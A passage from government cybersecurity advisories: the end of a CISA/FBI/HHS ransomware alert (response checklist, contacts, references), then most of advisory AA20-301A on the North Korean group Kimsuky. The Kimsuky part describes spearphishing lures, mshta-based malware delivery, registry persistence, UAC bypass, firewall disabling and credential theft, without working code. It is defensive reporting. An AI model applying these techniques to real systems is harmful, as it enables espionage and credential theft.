<li>NIST Securing Data Integrity White Paper: <a href=”https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft”>https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft</a></li>
</ul>

<h4>Ransomware Response Checklist</h4>

<p><strong>Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.</strong></p>

<p>Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a>, which contains steps for detection and analysis as well as containment and eradication.</p>

<h4><em>Consider the Need For Extended Identification or Analysis</em></h4>

<p>If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:</p>

<ul>
<li>Recovered executable file</li>
<li>Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible</li>
<li>Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li>
<li>Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)</li>
<li>Malware samples</li>
<li>Names of any other malware identified on your system</li>
<li>Encrypted file samples</li>
<li>Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)</li>
<li>Any PowerShell scripts found having executed on the systems</li>
<li>Any user accounts created in Active Directory or machines added to the network during the exploitation</li>
<li>Email addresses used by the attackers and any associated phishing emails</li>
<li>A copy of the ransom note</li>
<li>Ransom amount and whether or not the ransom was paid</li>
<li>Bitcoin wallets used by the attackers</li>
<li>Bitcoin wallets used to pay the ransom (if applicable)</li>
<li>Copies of any communications with attackers</li>
</ul>

<p>Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.</p>

<ul>
<li>CISA – Advanced Malware Analysis Center: <a href=”https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf”>https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf</a></li>
<li>Remote Assistance – Request via <a href=”https://us-cert.cisa.govCentral@cisa.gov”>Central@cisa.gov</a></li>
</ul>
<h3>Contact Information</h3><p>CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purpose of notification.</p>

<ul>
<li>State and Local Response Contacts</li>
<li>IT/IT Security Team – Centralized Cyber Incident Reporting</li>
<li>State and Local Law Enforcement</li>
<li>Fusion Center        </li>
<li>Managed/Security Service Providers</li>
<li>Cyber Insurance       </li>
</ul>

<p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”https://www.fbi.gov/contact-us/field-offices”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href=”https://us-cert.cisa.govCyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govCentral@cisa.dhs.gov”>Central@cisa.gov</a>.</p>

<p>Additionally, see <a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA and MS-ISAC’s Joint Ransomware Guide</a> for information on contacting—and what to expect from contacting—federal asset response and federal threat response contacts.</p>

<h3><em>Disclaimer</em></h3>

<p>This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <a href=”https://cisa.gov/tlp”>https://cisa.gov/tlp</a>.</p>
<h3>References</h3>
<ul> <li><a href=”https://www.cisa.gov/emergency-services-sector-continuity-planning-suite”>CISA Emergency Services Sector Continuity Planning Suite </a></li> <li><a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA MS-ISAC Joint Ransomware Guide</a></li> <li><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href=”https://www.ic3.gov/media/2019/191002.aspx”>FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations”</a></li> <li><a href=”https://healthsectorcouncil.org/hic-tcr/”>Health Industry Cybersecurity Tactical Crisis Response</a></li> <li><a href=”http://www.phe.gov/405d”>Health Industry Cybersecurity Practices (HICP) </a></li> <li><a href=”https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51″>HHS – Ransomware Spotlight Webinar </a></li> <li><a href=”https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51″>HHS – Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients</a></li> <li><a href=”https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51″>HHS – Ransomware Briefing </a></li> <li><a href=”https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51″>HHS – Aggressive Ransomware Impacts</a></li> <li><a href=”https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51″>HHS – Ransomware Fact Sheet</a></li> <li><a href=”https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51″>HHS – Cyber Attack Checklist</a></li> <li><a href=”https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51″>HHS – Cyber-Attack Response Infographic</a></li> <li><a href=”https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51″>NIST – Data Integrity Publication</a></li> <li><a href=”https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51″>NIST – Guide for Cybersecurity Event Recovery</a></li> <li><a href=”https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51″>NIST – Identifying and Protecting Assets Against Ransomware and Other Destructive Events </a></li> <li><a href=”https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51″>NIST – Detecting and Responding to Ransomware and Other Destructive Events </a></li> <li><a href=”https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51″>NIST – Recovering from Ransomware and Other Destructive Events </a></li> <li><a href=”https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456″>Github List of IOCs</a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 28, 2020: Initial version</li> <li>October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection</li> <li>November 2, 2020: Updated FBI link</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy & Use</a> policy.</p>

</div>

alerts

AA20-301A: North Korean Advanced Persistent Threat Focus: Kimsuky

Post author By admin
Post date October 27, 2020

Original release date: October 27, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the <a href=”https://attack.mitre.org/versions/v7/techniques/enterprise/”>ATT&CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the U.S. Cyber Command Cyber National Mission Force (CNMF). This advisory describes the tactics, techniques, and procedures (TTPs) used by North Korean advanced persistent threat (APT) group <a href=”https://attack.mitre.org/groups/G0094/”>Kimsuky</a>—against worldwide targets—to gain intelligence on various topics of interest to the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit <a href=”https://us-cert.cisa.gov/northkorea”>https://www.us-cert.cisa.gov/northkorea</a>.</p>

<p>This advisory describes known Kimsuky TTPs, as found in open-source and intelligence reporting through July 2020. The target audience for this advisory is commercial sector businesses desiring to protect their networks from North Korean APT activity.</p>

<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/TLP-WHITE_AA20-301A_North_Korean_APT_Focus_Kimsuky.pdf”>Click here</a> for a PDF version of this report.</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Key Findings</h4>

<p>This advisory’s key findings are:</p>

<ul>
<li>The Kimsuky APT group has most likely been operating since 2012.</li>
<li>Kimsuky is most likely tasked by the North Korean regime with a global intelligence gathering mission.</li>
<li>Kimsuky employs common social engineering tactics, spearphishing, and watering hole attacks to exfiltrate desired information from victims.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>1</a>],[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>2</a>]</li>
<li>Kimsuky is most likely to use spearphishing to gain initial access into victim hosts or networks.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>3</a>]</li>
<li>Kimsuky conducts its intelligence collection activities against individuals and organizations in South Korea, Japan, and the United States.</li>
<li>Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.</li>
<li>Kimsuky specifically targets:</li>
<li>
<ul>
<li>Individuals identified as experts in various fields,</li>
<li>Think tanks, and</li>
<li>South Korean government entities.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>4</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>5</a>],[<a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>6</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>7</a>],[<a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>8</a>]</li>
</ul>
</li>
<li>CISA, FBI, and CNMF recommend individuals and organizations within this target profile increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spearphishing, use of multi-factor authentication, and user awareness training.</li>
</ul>
<h3>Technical Details</h3><h4>Initial Access</h4>

<p>Kimsuky uses various spearphishing and social engineering methods to obtain <em>Initial Access</em> [<a href=”https://attack.mitre.org/tactics/TA0001/”>TA0001</a>] to victim networks.[<a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>9</a>],[<a href=”https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html”>10</a>],[<a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>11</a>] Spearphishing—with a malicious attachment embedded in the email—is the most observed Kimsuky tactic (Phishing: Spearphishing Attachment [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/001/”>T1566.001</a>]).[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>12</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>13</a>]</p>

<ul>
<li>The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail.[14]</li>
<li>Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link.
<ul style=”list-style-type: circle;”>
<li>Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The emails contained the subject line “Skype Interview requests of [Redacted TV Show] in Seoul,” and began with a request to have the recipient appear as a guest on the show. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula.</li>
<li>After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview.</li>
</ul>
</li>
<li>Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>15</a>],[<a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>16</a>],[<a href=”https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/”>17</a>]</li>
</ul>

<p>Kimsuky’s other methods for obtaining initial access include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions (<em>Phishing: Spearphising Link</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/002/”>T1566.002</a>], <em>Drive-by Compromise </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1189/”>T1189</a>], <em>Man-in-the-Browser</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>18</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Execution</h4>

<p>After obtaining initial access, Kimsuky uses <a href=”https://attack.mitre.org/software/S0414/”>BabyShark</a> malware and PowerShell or the Windows Command Shell for <em>Execution</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0002/”>TA0002</a>].</p>

<ul>
<li>BabyShark is Visual Basic Script (VBS)-based malware.
<ul>
<li>First, the compromised host system uses the native Microsoft Windows utility, <code>mshta.exe</code>, to download and execute an HTML application (HTA) file from a remote system (<em>Signed Binary Proxy Execution: Mshta</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005/”>T1218.005</a>]).</li>
<li>The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.</li>
<li>The script maintains<em> Persistence </em>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>] by creating a Registry key that runs on startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1547.001</a>]).</li>
<li> It then collects system information (<em>System Information Discovery</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1082″>T1082</a>]), sends it to the operator’s command control (C2) servers, and awaits further commands.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>19</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>20</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>21</a>],[<a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>22</a>]</li>
</ul>
</li>
<li>Open-source reporting indicates BabyShark is delivered via an email message containing a link or an attachment (see Initial Access section for more information) (<em>Phishing: Spearphising Link</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/002/”>T1566.002</a>], <em>Phishing: Spearphishing Attachment</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/001″>T1566.001</a>]). Kimsuky tailors email phishing messages to match its targets’ interests. Observed targets have been U.S. think tanks and the global cryptocurrency industry.[<a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>23</a>]</li>
<li>Kimsuky uses PowerShell to run executables from the internet without touching the physical hard disk on a computer by using the target’s memory (<em>Command and Scripting Interpreter: PowerShell </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/001/”>T1059.001</a>]). PowerShell commands/scripts can be executed without invoking <code>powershell.exe</code> through HTA files or <code>mshta.exe</code>.[<a href=”https://attack.mitre.org/groups/G0094/”>24</a>],[<a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>25</a>],[<a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>26</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>27</a>]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Persistence</h4>

<p>Kimsuky has demonstrated the ability to establish <em>Persistence</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>] through using malicious browser extensions, modifying system processes, manipulating the <code>autostart</code> execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions.</p>

<ul>
<li>In 2018, Kimsuky used an extension, which was available on the Google Chrome Web Store, to infect victims and steal passwords and cookies from their browsers (<em>Man-in-the-Browser </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]). The extension’s reviews gave it a five-star rating, however the text of the reviews applied to other extensions or was negative. The reviews were likely left by compromised Google+ accounts.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>28</a>]</li>
<li>Kimsuky may install a new service that can execute at startup by using utilities to interact with services or by directly modifying the Registry keys (<em>Boot or Logon Autostart Execution </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1547″>T1547</a>]). The service name may be disguised with the name from a related operating system function or by masquerading as benign software. Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution.[<a href=”https://attack.mitre.org/groups/G0094/”>29</a>],[<a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>30</a>]</li>
<li>During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. GREASE is a tool capable of adding a Windows administrator account and enabling RDP while avoiding firewall rules (<em>Remote Services: Remote Desktop Protocol </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1021/001″>T1021.001</a>]).[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>31</a>]</li>
<li>Kimsuky uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP) documents (<code>.hwp</code> files) in the Registry (<em>Event Triggered Execution: Change Default File Association</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/001″>T1546.001</a>]). Kimsuky manipulates the default Registry setting to open a malicious program instead of the legitimate HWP program (HWP is a Korean word processor). The malware will read and email the content from HWP documents before the legitimate HWP program ultimately opens the document.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>32</a>] Kimsuky also targets Microsoft Office users by formatting their documents in a <code>.docx</code> file rather than <code>.hwp</code> and will tailor their macros accordingly.[33]</li>
<li>Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source Hypertext Processor (PHP)-based web shells; these web shells enable the APT actor to upload, download, and delete files and directories on the compromised domains (<em>Server Software Component: Web Shell</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T505/003″>T1505.003</a>]). The actor often adds “Dinosaur” references within the modified web shell codes.[34]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Privilege Escalation</h4>

<p>Kimsuky uses well-known methods for <em>Privilege Escalation </em>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0004/”>TA0004</a>]. These methods include placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code in <code>explorer.exe</code>.</p>

<ul>
<li>Kimsuky has used Win7Elevate—an exploit from the Metasploit framework—to bypass the User Account Control to inject malicious code into <code>explorer.exe</code> (<em>Process Injection</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]). This malicious code decrypts its spying library—a collection of keystroke logging and remote control access tools and remote control download and execution tools—from resources, regardless of the victim’s operating system. It then saves the decrypted file to a disk with a random but hardcoded name (e.g., <code>dfe8b437dd7c417a6d.tmp</code>) in the user’s temporary folder and loads this file as a library, ensuring the tools are then on the system even after a reboot. This allows for the escalation of privileges.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>35</a>]</li>
<li>Before the injection takes place, the malware sets the necessary privileges (see figure 1). The malware writes the path to its malicious Dynamic Link Library (DLL) and ensures the remote process is loaded by creating a remote thread within <code>explorer.exe</code> (<em>Process Injection</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/”>T1055</a>]).[<a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>36</a>]</li>
</ul>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 1: Privileges set for the injection</em> [<a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>37</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Defense Evasion</h4>

<p>Kimsuky uses well-known and widely available methods for <em>Defense Evasion</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0005/”>TA0005</a>] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>38</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>39</a>]</p>

<ul>
<li>Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (<em>Impair Defenses: Disable or Modify System Firewall </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004/”>T1562.004</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>40</a>]</li>
</ul>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 2: Disabled firewall values in the Registry</em> [<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>41</a>]</p>

<ul>
<li>Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (<em>Indicator Removal on Host: File Deletion </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/004/”>T1070.004</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>42</a>]</li>
<li>Kimsuky has used <code>mshta.exe</code>, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious <code>.hta</code> files and JavaScript or VBS through a trusted windows utility (<em>Signed Binary Proxy Execution: Mshta</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005″>T1218.005</a>]). It can also be used to bypass application allow listing solutions (<em>Abuse Elevation Control Mechanism: Bypass User Access Control</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1548/002″>T1548.002</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>43</a>],[<a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>44</a>]</li>
<li>Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevatve is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (<em>Process Injection </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1055″>T1055</a>]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim’s temporary folder, and loads the file as a library.[<a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>45</a>],[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>46</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>47</a>]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Credential Access</h4>

<p>Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (<em>Credential Access</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0006/”>TA0006</a>]).<font color=”#000000″> </font></p>

<ul>
<li>Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses <code>ProcDump</code>, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (<em>OS Credential Dumping</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/”>T1003</a>]). <code>ProcDump</code> monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of <code>ProcDump</code> in the BabyShark malware.[<a href=”https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/”>48</a>]</li>
<li>According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (<em>Man-in-the-Browser</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>49</a>],[<a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>50</a>] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named <code>jQuery.js</code>, from a separate site (see figure 3).[<a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>51</a>]</li>
</ul>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 3: JavaScript file, named <code>jQuery.js</code></em> [<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>52</a>]</p>

<ul>
<li>Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (<em>Input Capture: Keylogging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001/”>T1056.001</a>], <em>Network Sniffing</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1040/”>T1040</a>]). MECHANICAL logs keystrokes to <code>%userprofile%appdataroamingapach.{txt,log}</code> and is also a “cryptojacker,” which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>53</a>]</li>
<li>Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Discovery</h4>

<p>Kimsuky enumerates system information and the file structure for victims’ computers and networks (<em>Discovery</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0007/”>TA0007</a>]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (<em>File and Directory Discovery </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1083/”>T1083</a>]). The information is directed to <code>C:WINDOWSmsdatl3.inc</code>, read by malware, and likely emailed to the malware’s command server.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>55</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Collection</h4>

